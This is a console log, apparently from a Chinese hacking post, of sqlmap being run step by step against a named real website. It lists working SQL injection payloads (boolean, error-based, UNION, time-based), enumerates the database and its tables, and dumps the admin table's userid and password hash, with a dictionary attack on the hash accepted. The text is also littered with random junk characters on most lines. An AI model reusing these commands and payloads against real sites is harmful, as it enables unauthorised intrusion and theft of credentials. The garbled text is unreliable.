D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: a2 L5 `* u; O" Vms "Mysql" --current-user /* 注解:获取当前用户名称
% f* V- C7 t- k$ G sqlmap/0.9 - automatic SQL injection and database takeover tool
3 T( Y- Z# W+ f2 l+ h( @ http://sqlmap.sourceforge.net starting at: 16:53:54' [. l: |4 d9 Z% }
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 l# f. z# Q% T- H" k
session file
; p! }% @8 L" a: ]+ H[16:53:54] [INFO] resuming injection data from session file& L! T: \" r, L% \& G+ H/ E" w$ k: {
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file& M3 D) r6 Q4 B! b
[16:53:54] [INFO] testing connection to the target url9 ^/ i, h) W9 ?
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ n# S y7 H2 ?7 b+ S# Qsts:
9 p! R, m- R% g o3 z; n8 P5 g* J---) W' c9 {+ Y& l: z% c
Place: GET3 Z: K# }# k7 `3 _
Parameter: id- ]! s* O, f/ `
Type: boolean-based blind: u; C! q" l \$ u' H
Title: AND boolean-based blind - WHERE or HAVING clause# m0 W8 I* N& W# N% Z
Payload: id=276 AND 799=7992 j; G+ t7 ?& A6 ?4 R! R
Type: error-based
: K+ q; S$ r3 w, s Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 o7 j. d/ j& A7 M& u
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' H( C4 S2 w* O/ c/ f! G/ d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) Q4 f9 N& g- D) ]
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
5 o" L4 s7 h' r' _. r8 t9 f Type: UNION query0 x- ?9 [2 H. f
Title: MySQL UNION query (NULL) - 1 to 10 columns
! \" N8 z8 G& n4 e8 g, @ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ {1 F; A& l0 f' r; M V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ f- w* ^3 M3 {$ b4 L( r: @" JCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ R$ x {3 {7 x# b5 n5 v9 m( U0 o
Type: AND/OR time-based blind
1 J' l5 a$ l3 W4 z4 b$ v Title: MySQL > 5.0.11 AND time-based blind
3 P& ~+ ~9 G" I8 r; g, P; s% { Payload: id=276 AND SLEEP(5)2 N- J; [2 _0 w# t
---
5 m2 u2 J0 h, s- O' _1 O* E# b[16:53:55] [INFO] the back-end DBMS is MySQL3 t9 `: R5 k3 ~
web server operating system: Windows4 M) p/ h3 Z4 w) Z
web application technology: Apache 2.2.11, PHP 5.3.0. Y9 W( N* f) M2 n/ A6 Y
back-end DBMS: MySQL 5.0
, S; P* B4 f: S* l- T1 C- i; {& d[16:53:55] [INFO] fetching current user a3 y- G; X4 Y! a' T
current user: 'root@localhost' 3 [& L# F3 ^# I- n
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
" r' T$ s- B$ O6 _3 B8 F- Y* ^( |2 xtput\www.wepost.com.hk' shutting down at: 16:53:58/ G' p4 S z a5 c( J( R
3 Q3 X- J$ M# o' `8 n
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# r" B* t3 W/ k5 h: j+ l+ P7 X/ lms "Mysql" --current-db /*当前数据库2 e8 ^. K4 R! n5 T
sqlmap/0.9 - automatic SQL injection and database takeover tool
% J7 ?! Y$ l" W) M: L http://sqlmap.sourceforge.net starting at: 16:54:161 M/ _, S$ Q/ k' y. J. e
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
2 w% m$ b7 D8 z3 | session file
# a6 }& v/ m# Y3 p8 G, v! k[16:54:16] [INFO] resuming injection data from session file0 z D7 M1 r1 W8 \6 b; A2 H6 K
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
+ r* l5 ?" t5 P7 x0 T c: u" F[16:54:16] [INFO] testing connection to the target url# B9 ^& q1 u0 t' {. P# |" b% V0 K
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
& E9 d& H8 B k0 C4 @sts:1 K" Z, }. x$ r
---
! P4 ~% i7 `! a1 kPlace: GET
) i, q8 K- \9 v, @/ nParameter: id- y& ^' Y9 U J; F2 b
Type: boolean-based blind
. m! X- B/ k1 X* O Title: AND boolean-based blind - WHERE or HAVING clause2 G8 I8 Z, w! J5 v% Q* B T4 l; [
Payload: id=276 AND 799=799* O3 O7 K% M/ H* G6 R, {
Type: error-based
! a, k" ^7 s; p4 A0 F) h Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause _# w6 b1 T7 j
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ V5 h7 A( _8 |8 T+ Q8 j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
G4 a K P4 N2 X# R O" y* N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). z! u2 c! _9 X; q7 |! m+ p
Type: UNION query
' X2 X0 l/ _; |4 F D Title: MySQL UNION query (NULL) - 1 to 10 columns' ^4 ^: S+ }5 C* V2 v
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
- Y: `) e/ F2 ]' |0 L+ A, g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),: @+ ?& v) v5 m0 t0 k s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 T9 T" `+ w1 y! j9 |$ z2 |- V Type: AND/OR time-based blind# W4 Z4 y/ k) O3 K
Title: MySQL > 5.0.11 AND time-based blind
: [- q' r' L1 ?5 D Payload: id=276 AND SLEEP(5)" |7 [5 ^! b* i
---' E4 w; M* V7 C# Y, [0 `2 w
[16:54:17] [INFO] the back-end DBMS is MySQL
* N0 | n) J5 ?" ]* G, cweb server operating system: Windows2 B" k- X! H: R. \- ^+ g1 M7 K2 P3 `# ?
web application technology: Apache 2.2.11, PHP 5.3.05 L7 \' ~# r+ {6 c
back-end DBMS: MySQL 5.0
: i, y- J; F0 ^- |% n: _# d[16:54:17] [INFO] fetching current database9 Y- C2 |/ |; c% \. n0 y* I
current database: 'wepost'! f. |4 F; g$ `& t9 g
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou0 v- O; j, y# A/ \5 d
tput\www.wepost.com.hk' shutting down at: 16:54:186 W7 J2 v2 U# N3 m2 {# w0 T
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; t+ |& I% q# _
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名& ^9 a( b& Q) W# @: E
sqlmap/0.9 - automatic SQL injection and database takeover tool3 [3 k" s& [0 ^6 u( r) a1 b( Z2 S
http://sqlmap.sourceforge.net starting at: 16:55:25
, A& R0 J C+ o) @0 S: j5 P# @) S[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 e4 ~6 m+ Z+ \$ ?
session file
% M$ f- j% T$ }[16:55:25] [INFO] resuming injection data from session file9 T: E; w( @0 J5 A6 `: n
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 v# r7 x2 H& b& J" x# A/ ?[16:55:25] [INFO] testing connection to the target url
* s' f1 |& @. a& Y% x+ S) P% r. Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque% l8 @ i* q9 S0 J, u$ O3 w g
sts:
& E3 B8 \5 P. ~1 l# a# k---5 X5 _0 ^9 R) P
Place: GET6 G! g4 U9 E. o9 i
Parameter: id4 B& |4 U! L q- e" q) B( j
Type: boolean-based blind
& {' Y F/ T* F9 `! `% @ Title: AND boolean-based blind - WHERE or HAVING clause
, h+ F1 W; x1 U7 L Payload: id=276 AND 799=799! ]8 ^. B, i3 N: Y0 P- Z0 z
Type: error-based5 h' ?- P6 C$ T+ y1 B
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ }% ?, k* x$ |- e0 O2 q, O Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
W! U. P+ l# U120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( n: k) g& y7 U# k/ q5 d1 W$ f
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 @ l8 n0 S, u8 x2 c$ l, p- l. e4 u
Type: UNION query
5 Y& f" U6 C6 A, c; _7 s+ A% d: @ Title: MySQL UNION query (NULL) - 1 to 10 columns6 z6 N1 p5 Q" O3 | b, Y N
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: v! |8 q- Q* Q+ N) B$ S1 q
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
% y. J' K( | x( q) L9 sCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 E8 b) m$ p; x4 | Type: AND/OR time-based blind+ [, k/ c& n' t5 ^
Title: MySQL > 5.0.11 AND time-based blind0 F4 u6 y2 [0 o& G- t
Payload: id=276 AND SLEEP(5)# A) [" j+ {% a" s6 T
---0 `' m8 N7 H# F" b$ F+ X
[16:55:26] [INFO] the back-end DBMS is MySQL
S0 i7 X) Y: ]6 iweb server operating system: Windows
, {; g' A5 ~; y" R& ]! g! E/ B( Xweb application technology: Apache 2.2.11, PHP 5.3.0" e3 l/ E$ ?& E% q
back-end DBMS: MySQL 5.0% o- T9 T( k8 \7 [. |! `3 @; }/ E. R- [
[16:55:26] [INFO] fetching tables for database 'wepost'2 k6 E& X- T7 C$ R8 K
[16:55:27] [INFO] the SQL query used returns 6 entries! z# a l! b& a5 R. n( J: }
Database: wepost7 j; a2 g8 A1 U/ l9 [ g4 \! f5 y
[6 tables]; O% Z; `) S; |3 x) Y; m% u( T
+-------------+
; Q' Q: _: w* j$ G; s5 }| admin |
$ v" t1 z% R) j7 F| article |
( k# @1 i( T6 \- U. n0 n0 S| contributor |
2 `2 {: q) O; W& G/ v2 a/ Q8 K5 a* s| idea |; M! d8 z8 F4 g( O3 Z0 n
| image |/ z/ V, M4 o) }" I! j3 X0 c* E3 w
| issue |
! ?6 u7 O: L8 A3 Q- S+-------------+
: t: \2 z2 T# Z$ [0 A9 a[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou( M2 c. ]" h' V
tput\www.wepost.com.hk' shutting down at: 16:55:33
. Q* p" t m4 j7 S1 s" ~0 h$ k, v
7 E( i* V1 a2 _2 {- {+ K4 @9 }. jD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, t2 X& B& b' R& }ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
# t9 U8 O+ _7 T Z* X! s/ ` sqlmap/0.9 - automatic SQL injection and database takeover tool: @# i2 Y* ]0 ~+ O2 A
http://sqlmap.sourceforge.net starting at: 16:56:06
- ?2 O% m$ e! Z; Dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
# i9 `) Y5 F' H& wsts:
" L3 A9 Q+ k' u( M7 k' g---9 U8 k2 R1 r2 A5 S4 X
Place: GET' D; h" N% p( K: [' m
Parameter: id, @8 r; P, Q0 u3 d# O& V/ j8 R: i
Type: boolean-based blind
% V; M6 R, A! N% @$ M% y Title: AND boolean-based blind - WHERE or HAVING clause# q$ z) M' ^/ X0 q0 e
Payload: id=276 AND 799=7996 q; {& j, U' l5 b5 p ~7 j
Type: error-based
4 v' @# n+ `$ Q R5 }, e( `5 |# v Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ E8 {$ u9 L( O) ^- f4 l Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; D M: F) J4 s1 r7 _- f3 z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
$ S$ K# H, e' O" t),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
( ?3 V1 U' S9 \5 ~% \3 g Type: UNION query8 y+ x2 a+ w9 ~2 B
Title: MySQL UNION query (NULL) - 1 to 10 columns. ^' V: L0 W! R% p" ]6 D4 _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 b& O0 Q: X* Q# S) Q5 ~
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),# u+ F7 [4 k* o: Z/ K& D, F
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ _. ?/ x% r9 i8 q6 e9 x1 U! l Type: AND/OR time-based blind# v# f# I6 |: }; x7 } \
Title: MySQL > 5.0.11 AND time-based blind2 H) _+ x5 L/ Z' t. ^& `
Payload: id=276 AND SLEEP(5)
! A7 k8 c: u* g, I---
' t& d- n2 R" |- P. zweb server operating system: Windows
% f) s1 u `! f! p% y n) {web application technology: Apache 2.2.11, PHP 5.3.0
% ?, y9 P, O1 `, ]back-end DBMS: MySQL 5.0% t7 a4 M; T, H0 _) i
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
0 l) N" e X* h$ ]6 p& assion': wepost, wepost
% V: s w3 O( v3 a' nDatabase: wepost+ H; q! x9 G U/ N
Table: admin! D7 @& j: P/ r- _ A" | f
[4 columns]
( t5 g) k$ b4 k. j6 F" G2 }+----------+-------------+; D, w+ A( G# b: C5 z! g
| Column | Type |0 ^7 I9 O: L$ |. O4 A
+----------+-------------+9 N0 B4 R- F/ f: H) Q8 Z
| id | int(11) |
7 s2 V! J8 Z+ P8 I' ]| password | varchar(32) |
5 s5 f @; @: l4 ]& F. i0 ]# y| type | varchar(10) |
; S' x# H$ c) t" ^8 v; w| userid | varchar(20) |
6 y. K; w8 c! Y" `3 O+----------+-------------+- i! T5 t: H9 @
shutting down at: 16:56:19
4 h' ^! N9 S, `% o8 [" z8 s
" h8 l. F0 B. a3 h- D# U. _# @; [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
( u+ u2 }% o, b( R/ Z" xms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
2 x+ @& r/ {, s( |: K8 h; l0 p! K sqlmap/0.9 - automatic SQL injection and database takeover tool
{& E+ F% d, i- d http://sqlmap.sourceforge.net starting at: 16:57:14
9 s0 p" w4 Y; D& w8 Isqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ e5 y8 s Z- h$ \) v5 Nsts:
' x& G" [% a7 A---* T) X# q- B) L3 n& t A* C7 |$ O
Place: GET/ A; F A; ?1 D: e% i9 a0 B
Parameter: id' U' k$ q, O1 K% o% o x3 @
Type: boolean-based blind
+ \+ F. W' K, w# ~ Title: AND boolean-based blind - WHERE or HAVING clause7 y& }) u/ U( a8 E( p5 _+ s
Payload: id=276 AND 799=799, \. X4 r& m. o5 k! q8 M7 U
Type: error-based
: o. ?7 t. p4 I Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
?( L6 V3 ]5 h+ x: g Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
* {" |4 j: a/ @. S S' w: B; R: v i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. f* o9 A2 r7 T7 N
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 S6 E9 E0 K9 K8 W Type: UNION query* C+ b+ ]) L( T
Title: MySQL UNION query (NULL) - 1 to 10 columns+ d; ]5 }! h) `5 m
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 T% C% f( [ G4 n5 K. i9 f
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( g7 w7 {5 n" q8 R& K& C) a# PCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) \; d X' X# ?. b
Type: AND/OR time-based blind
: N) g e. ]7 e& @ Title: MySQL > 5.0.11 AND time-based blind
n; E2 K! k4 ~! r+ o Payload: id=276 AND SLEEP(5)
" d3 b) D y' M- O. ]* [3 b1 a---& ?) A/ n: X+ W, U
web server operating system: Windows
) u2 t8 i9 m4 @web application technology: Apache 2.2.11, PHP 5.3.0
" r0 H+ j+ I7 X0 \6 qback-end DBMS: MySQL 5.0
0 L5 C6 R7 q( U4 m- Grecognized possible password hash values. do you want to use dictionary attack o
; i7 G1 _- U2 m5 `- E* qn retrieved table items? [Y/n/q] y7 b, `- Y" h6 z3 n
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
, A3 ~' |$ T B* Ydo you want to use common password suffixes? (slow!) [y/N] y: d1 z0 r5 I1 p! G1 W6 ], }
Database: wepost7 Q, ]3 S" D9 K1 Z1 {" z
Table: admin
2 a& J% Y( W2 U* m2 p0 r( m6 u. p[1 entry]
9 K. U3 f- Z& J+----------------------------------+------------+; D3 p% {+ ~8 v7 u' ~
| password | userid |
1 i" {: i; d: N) T+----------------------------------+------------+1 |% ? F8 U# ?7 Z. W
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
* A- W. I: M$ m' L7 z9 Q) n+----------------------------------+------------+
. l4 r) A/ K1 H* h2 e) C shutting down at: 16:58:144 S9 [( a9 p4 h, P( _
+ V% k" _' e" H
D:\Python27\sqlmap> |